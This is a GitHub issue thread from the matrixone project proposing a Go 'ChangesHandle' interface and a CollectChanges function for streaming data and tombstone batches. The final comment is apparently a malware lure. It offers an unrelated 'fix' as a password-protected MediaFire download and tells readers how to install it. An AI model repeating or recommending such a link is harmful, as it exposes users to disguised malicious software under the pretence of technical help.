### ISSUE TITLE
[Tech Request]: add changes handle

### ISSUE THREAD

**Issue by jiangxinmeng1** [matrixorigin/matrixone#18455]
### Is there an existing issue for the same tech request?

- [X] I have checked the existing issues.

### Does this tech request not affect user experience?

- [X] This tech request doesn't affect user experience.

### What would you like to be added ?

```Markdown
type ChangesHandle_Hint int

const (
	ChangesHandle_Snapshot ChangesHandle_Hint = iota
	ChangesHandle_Tail_wip
	ChangesHandle_Tail_done
)

type ChangesHandle interface {
	//两个batch都为空，结束。然后close
	//batch每列的字段
	//    data 用户定义列，ts
	//    tombstone 主键，ts
	Next() (data *batch.Batch, tombstone *batch.Batch, hint ChangesHandle_Hint, err error)
	Close() error
}
CollectChanges(from, to types.TS, mp *mpool.MPool, ctx context.Context) (ChangesHandle, error)
```
```


### Why is this needed ?

_No response_

### Additional information

_No response_

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
